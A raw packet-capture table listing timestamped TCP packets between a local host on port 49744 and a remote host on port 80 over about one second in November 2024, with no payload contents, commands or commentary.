                                                                                                                                                                                  Nov 23, 2024 14:46:38.512866974 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.513473034 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.513495922 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.513504982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.513541937 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.513591051 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.515043020 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.515295982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.515345097 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.632045984 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.632105112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.632174015 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.636158943 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.637923956 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.637975931 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.637993097 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.682060003 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.704883099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.704993963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.705044985 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.709145069 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.709225893 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.709283113 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.717618942 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.717729092 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.717777967 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.726077080 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.726212025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.726258039 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.734582901 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.734781027 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.734858036 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.743036032 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.743145943 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.743194103 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.751502037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.751574039 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.751627922 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.759938002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.760040045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.760087013 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.768318892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.768452883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.768520117 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.776731014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.777015924 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.777064085 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.785065889 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.838318110 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.871694088 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.871723890 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.871798992 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.875904083 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.896996975 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.897069931 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.897082090 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.899291039 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.899377108 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.899403095 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.903871059 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.903938055 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.903951883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.908381939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.908458948 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.908509970 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.912911892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.912974119 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.912988901 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.917629004 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.917640924 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.917716026 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.922063112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.922136068 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.922168016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.926580906 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.926636934 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.926691055 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.931090117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.931162119 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.931175947 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.935662031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.935760975 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.935780048 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.940191031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.940243006 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.940310955 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.944781065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.944844007 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.944875002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.949270964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.949331045 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.949347019 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.953862906 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.953924894 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.953950882 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.958396912 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.958472013 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.958496094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.962898016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.962945938 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.963007927 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.967444897 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.967499971 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.967545986 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.972198009 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.972232103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.972259998 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.976557016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.976613045 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.976680994 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.981092930 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.981137991 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.981174946 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.985582113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.985646009 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.063673019 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.063749075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.063819885 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.065923929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.066003084 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.066075087 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.070396900 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.089138031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.089190006 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.089199066 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.090951920 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.091001034 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.091069937 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.094705105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.094785929 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.094799995 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.098524094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.098576069 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.098633051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.102174997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.102226019 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.102283955 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.105880976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.105947971 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.105973959 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.109622955 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.109672070 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.109684944 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.113346100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.113396883 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.113442898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.117059946 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.117125988 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.117196083 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.120762110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.120806932 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.120862007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.124530077 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.124577999 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.124591112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.128238916 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.128324032 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.128345013 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.131989956 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.132038116 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.132091045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.135740042 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.135785103 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.135838032 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.139426947 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.139497042 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.139525890 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.143131971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.143181086 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.143256903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.146975994 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.147037029 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.147175074 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.150125027 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.150191069 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.150336981 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.153266907 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.153310061 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.153374910 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.156497955 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.156541109 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.156600952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.159693003 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.159744024 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.159758091 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.162854910 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.162909985 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.162930012 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.166126966 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.166198969 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.166256905 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.169231892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.169271946 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.169302940 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.172384024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.172435045 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.172527075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.175590992 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.175637960 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.175848961 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.178879976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.178951979 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.178965092 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.182142019 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.182187080 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.182288885 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.185236931 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.185290098 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.185480118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.188366890 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.188412905 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.188460112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.191745996 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.191812038 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.191881895 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.194750071 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.194792986 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.194844007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.197978020 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.198024988 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.198112965 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.201136112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.201186895 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.202409029 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.244555950 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.258671999 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.258685112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.258706093 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.258728027 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.258805037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.258838892 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.260792971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.260920048 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.260963917 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.263008118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.263165951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.263206959 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.265975952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.265991926 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.266035080 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.268892050 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.281476021 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.281526089 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.281550884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.282650948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.282700062 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.282720089 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.284723997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.284779072 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.284940958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.287585974 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.287616014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.287637949 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.290008068 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.290056944 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.290110111 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.292629004 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.292670012 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.292745113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.295123100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.295161009 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.295228958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.297671080 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.297720909 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.297761917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.300143957 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.300187111 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.300204992 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.302681923 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.302716017 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.302795887 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.305228949 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.305258989 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.305315971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.307806015 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.307818890 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.307846069 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.310286045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.310338974 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.310359955 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.312513113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.312546015 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.312566996 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.314770937 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.314810991 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.314899921 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.316976070 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.317018986 CET4974480192.168.2.4185.215.113.16
